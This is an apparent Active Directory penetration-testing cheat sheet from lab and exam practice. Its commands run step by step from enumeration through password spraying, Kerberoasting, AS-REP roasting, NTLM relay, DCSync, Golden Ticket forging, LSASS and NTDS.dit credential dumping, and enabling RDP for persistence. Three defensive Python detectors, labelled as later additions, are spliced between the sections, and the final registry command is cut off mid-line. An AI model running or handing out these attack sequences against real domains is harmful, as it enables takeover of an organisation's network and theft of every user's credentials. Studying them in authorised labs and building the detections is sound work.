0. Host Discovery

sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5

1. Network & Service Discovery

📌 Identify open ports, services, and AD infrastructure.

🛠️ Tools: nmap, bloodhound, rpcclient, enum4linux, crackmapexec, kerbrute

✅ Scan the network for AD-related services:

nmap -sV -A <target>
  • Get the domain name
  • Identify interesting ports: 80, 20, 445, 3389, 5985 (5985 is not in nmap's default port list, so scan it explicitly!)

✅ List domain controllers and AD hosts:

crackmapexec smb <target>/24 --shares
nslookup -type=SRV _ldap._tcp.dc._msdcs.<DOMAIN>

✅ Check for SMB null sessions (anonymous access)

smbclient -L //<IP> -N
enum4linux -a <IP>
  • If successful, check shared folders for credentials or configuration files.

2. User Enumeration

📌 Find valid domain users for password attacks or Kerberoasting.

🛠️ Tools: kerbrute, rpcclient, ldapsearch, GetADUsers.py, smbclient

✅ Enumerate users via LDAP (anonymous bind if it works, otherwise any valid credentials)

ldapsearch -H ldap://DC20.oscp.exam -D 'g.jarvis@oscp.exam' -w Password123 -b 'dc=oscp,dc=exam' | grep "description:"
  • ➡️ If this works, try windapsearch

    Windapsearch tool can be used to query the domain further:

    python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 -U
    • ➡️➡️ If this works, enumerate all objects

      Enumerate all objects in the AD:

      python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*"
       
      # Look for service accounts:
       
      python3 /opt/windapsearch.py -d htb.local --dc-ip 10.10.10.161 --custom "objectClass=*" | grep "svc-"
      CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

✅ Enumerate users via SMB (if anonymous access is allowed)

rpcclient -U "" <IP>
enumdomusers
 
Filter:
cat unfiltered.txt | cut -d '[' -f2 | cut -d ']' -f1

✅ Enumerate users via Kerberos (user guessing attack)

Download: https://github.com/ropnop/kerbrute/releases/

  • Works well if you found employee names somewhere on a web server
kerbrute userenum users.txt --dc dc01.inlanefreight.local -d inlanefreight.local

✅ RID cycling

  • RID cycling enumerates user accounts through a null session by walking the RIDs of the domain SID (SID-to-RID lookup).
netexec smb 10.10.11.231 -u guest -p '' --rid-brute
 
or
 
/usr/share/doc/python3-impacket/examples/lookupsid.py -no-pass 'guest@rebound.htb' 20000
 
or grep only users
 
/usr/share/doc/python3-impacket/examples/lookupsid.py -no-pass 'guest@rebound.htb' 8000 | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tee users

3. Password Policy & Safe Spraying

📌 Identify password policies to perform safe password spraying.

🛠️ Tools: crackmapexec, Get-ADDefaultDomainPasswordPolicy

✅ Check password policy restrictions (lockout threshold and observation window):

crackmapexec smb <DC-IP> -u <user> -p <password> --pass-pol

✅ Safe password spraying (check for locked accounts first!)

  • Works well if you found a password somewhere
  • Sometimes users use their username as their password!
sudo crackmapexec smb 192.168.110.55 -u userlist.txt -p 'P@ssw0rd' --continue-on-success

Or try local password spray:

crackmapexec winrm 192.168.176.96 -u users.txt -p 'New2Era4.!' --local-auth
awk '{print tolower($0)}' users.txt > passwords.txt
sudo crackmapexec smb 10.10.11.236 -u users.txt -p passwords.txt --continue-on-success
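A defender-side companion to the spraying commands above, added here and not part of the original notes: detection logic over constructed 4625 logon-failure records (simplified dict fields, not raw EVTX) that flags one source failing logons against many distinct accounts inside a short window, which is what a spray looks like from the DC.

```python
"""Detect password-spray patterns in Windows logon-failure events (4625).

Added defensive example, not part of the original notes: a spray shows up as
one source failing logons against many distinct accounts, a few tries each,
whereas a user mistyping their own password hits one account repeatedly.
The records below are constructed sample data in a simplified dict form."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4625 events: timestamp, source IP, target account
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "src": "192.168.110.55", "user": "a.jones"},
    {"time": "2024-05-01T09:00:02", "src": "192.168.110.55", "user": "b.smith"},
    {"time": "2024-05-01T09:00:04", "src": "192.168.110.55", "user": "c.brown"},
    {"time": "2024-05-01T09:00:06", "src": "192.168.110.55", "user": "d.white"},
    {"time": "2024-05-01T09:00:08", "src": "192.168.110.55", "user": "e.green"},
    # A single user retrying their own password is not a spray
    {"time": "2024-05-01T09:10:00", "src": "10.0.0.7", "user": "s.smith"},
    {"time": "2024-05-01T09:10:30", "src": "10.0.0.7", "user": "s.smith"},
    {"time": "2024-05-01T09:11:00", "src": "10.0.0.7", "user": "s.smith"},
]


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: sorted target accounts} for every source that failed
    logons against at least min_users distinct accounts within one window."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))
    hits = {}
    for src, items in by_src.items():
        items.sort()
        lo = 0
        # Sliding window over this source's failures, oldest to newest
        for hi in range(len(items)):
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            users = {user for _, user in items[lo:hi + 1]}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(users)} accounts {users}")
```

Tune `window` and `min_users` to the lockout observation window and threshold the policy check above reports, so the alert fires on exactly the cadence an attacker would stay under.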

4. Credential Hunting (Low Hanging Fruits)

📌 Find credentials in descriptions, GPP files, shared folders, etc.

🛠️ Tools: bloodhound-python, crackmapexec, secretsdump.py, smbclient

✅ Check user descriptions for leaked passwords

ldapsearch -x -h <DC-IP> -b "DC=domain,DC=com" | grep -i "description"

✅ Check Group Policy Preferences (GPP) for stored credentials

smbclient \\\\<DC-IP>\\SYSVOL -U <user>
  • Look for XML files in SYSVOL containing <cpassword>
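A defensive audit for the GPP cpassword issue above, added here and not the notes' own tooling: it walks a SYSVOL copy and reports every XML element still carrying cpassword, using a constructed Groups.xml sample (the cpassword value is a placeholder, and nothing is decrypted).

```python
"""Audit Group Policy Preference XML files for the cpassword attribute.

Added defensive example, not from the original notes: GPP files under SYSVOL
that still carry cpassword (MS14-025) should be reported and the policy rebuilt
without embedded credentials. The XML is a constructed sample; nothing is
decrypted, only the presence of the attribute is reported."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample Groups.xml in the shape GPP writes (value is a placeholder)
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc-backup">
    <Properties action="U" userName="svc-backup" cpassword="CONSTRUCTED_PLACEHOLDER=="/>
  </User>
</Groups>"""

# GPP stores the account next to cpassword under different attribute names
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


def find_cpassword(root_dir):
    """Walk root_dir (e.g. a SYSVOL copy) and return a sorted list of
    (relative path, account) for each element carrying a non-empty cpassword."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue  # not a well-formed policy file, skip it
            for elem in tree.iter():
                if elem.get("cpassword"):
                    account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
                    findings.append((os.path.relpath(path, root_dir), account))
    return sorted(findings)


def demo():
    """Write the constructed sample into a temp tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies", "Machine", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return find_cpassword(tmp)
```

Point `find_cpassword` at a mounted or copied SYSVOL to get the list of policies that still need to be cleaned up.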

✅ Enumerate SMB shares for stored passwords (do it for all machines!)

netexec smb <target> -u <user> -p <password> --shares [--get-file \\<filename> <filename>]
 
smbclient -L //<DC-IP> -U <user>

Anonymous SMB check:

netexec smb <ip_range> -u '' -p ''

5. Common AD Attacks

5.1. Kerberoasting (If any users have SPN set)

📌 Extract service account tickets for offline cracking.

🛠️ Tools: GetUserSPNs.py, impacket

GetUserSPNs.py <DOMAIN>/<USER>:<PASSWORD> -dc-ip <DC-IP> -request
  • Need AD user credentials
  • Crack hashes using hashcat or john.

5.2. AS-REP Roasting (Users with Kerberos pre-authentication disabled)

📌 Extract crackable AS-REP hashes of vulnerable users for offline cracking.

🛠️ Tools: GetNPUsers.py, hashcat

GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
  • Mostly works for operational/service accounts

  • ➡️ If this works, crack the hash

    john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
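Detection logic for the two attacks in 5.1 and 5.2, added here and not part of the original notes: it runs over constructed, simplified DC audit records (4769 and 4768 events with only the fields used) and flags RC4 service-ticket requests for user accounts and TGTs issued without pre-authentication.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in DC Kerberos audit events.

Added defensive example, not from the original notes. Kerberoasting shows up
as 4769 (TGS request) events for user accounts with RC4 ticket encryption
(0x17), usually many from one source in a short time; AS-REP roasting shows up
as 4768 (TGT request) events with PreAuthType 0 (no pre-authentication). Event
fields are simplified and the records below are constructed sample data."""
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; AES is 0x11 / 0x12

# Constructed sample events (only the fields the checks need)
SAMPLE_EVENTS = [
    {"id": 4769, "service": "svc-alfresco", "enc": "0x17", "src": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "service": "svc-sql", "enc": "0x17", "src": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "service": "svc-web", "enc": "0x17", "src": "10.10.14.5", "status": "0x0"},
    {"id": 4769, "service": "DC01$", "enc": "0x12", "src": "10.10.10.50", "status": "0x0"},
    {"id": 4769, "service": "krbtgt", "enc": "0x12", "src": "10.10.10.50", "status": "0x0"},
    {"id": 4768, "target": "svc-alfresco", "preauth": "0", "enc": "0x17", "src": "10.10.14.5", "status": "0x0"},
    {"id": 4768, "target": "s.smith", "preauth": "2", "enc": "0x12", "src": "10.10.10.50", "status": "0x0"},
]


def kerberoast_sources(events, min_services=3):
    """Return {source_ip: sorted service accounts} for sources that obtained RC4
    service tickets for at least min_services distinct user accounts. Machine
    accounts (trailing $) and krbtgt are skipped: their tickets are not the
    ones taken away for offline cracking."""
    per_src = defaultdict(set)
    for ev in events:
        if ev["id"] != 4769 or ev["status"] != "0x0" or ev["enc"] != RC4_HMAC:
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_src[ev["src"]].add(svc)
    return {src: sorted(s) for src, s in per_src.items() if len(s) >= min_services}


def asrep_accounts(events):
    """Return sorted accounts that were issued a TGT without pre-authentication
    (PreAuthType 0), i.e. accounts exposed to AS-REP roasting."""
    return sorted({ev["target"] for ev in events
                   if ev["id"] == 4768 and ev["status"] == "0x0" and ev["preauth"] == "0"})
```

Accounts returned by `asrep_accounts` are the ones to re-enable pre-authentication on; sources returned by `kerberoast_sources` are worth correlating with the spraying and enumeration signals from the earlier sections.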

5.3. NTLM Relay Attacks

📌 Intercept authentication requests and relay them to gain access.

🛠️ Tools: ntlmrelayx.py, Responder

sudo responder -I eth0
ntlmrelayx.py -tf targets.txt -smb2support

6. Privilege Escalation (From User to Admin)

📌 Gain admin privileges through misconfigurations and ACL abuse.

🛠️ Tools: bloodhound, crackmapexec, seatbelt, winpeas

✅ Run BloodHound to analyze attack paths

bloodhound-python -u svc-alfresco -p s3rvice -d htb.local -ns 10.10.10.161 -c All
  • Check for:
    • User with Delegation Rights
    • Users with WriteDACL privileges
    • GPO modifications
    • DCSync permissions

✅ Look at your user in detail in the AD context

Get-ADUser -identity s.smith -properties *
 
whoami /all
# Shows both local and AD groups
  • You might find something that is not visible in BloodHound

  • Pay attention to:

    • MemberOf
    • ScriptPath
    • Groups for local and AD escalation
  • ➡️ If there is a logon script

    You can download it with SMB:

    smbclient \\\\10.10.10.182\\NETLOGON -U s.smith

✅ Local privilege escalation

net user s.smith
  • Consider the local route too: file, local group and process enumeration
  • Especially if you are already on the DC!

✅ ACL abuse (modify user/group privileges)

  • If a user has WriteDACL on another user:
Set-ADUser -Identity victim -Replace @{memberOf="CN=Domain Admins,CN=Users,DC=domain,DC=com"}
 

✅ Golden Ticket attack (if the krbtgt hash is obtained)

mimikatz
lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz
kerberos::golden /user:Administrator /domain:<domain> /sid:<SID> /krbtgt:<HASH>

7. Domain Administrator compromise

✅ AllowToDelegate attack

Use Rubeus.exe to get the Administrator's / DC$ TGT and TGS, which enables DCSync

8. Post-Exploitation (Persistence & Exfiltration)

📌 After gaining Domain Admin privileges, establish persistence.

🛠️ Tools: mimikatz, powerview, secretsdump.py

✅ Dump all credentials from LSASS

mimikatz
sekurlsa::logonpasswords
 

✅ Dump NTDS.dit (full AD credential dump)

secretsdump.py -just-dc <DOMAIN>/<USER>@<DC-IP>

✅ Enable RDP for future access

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /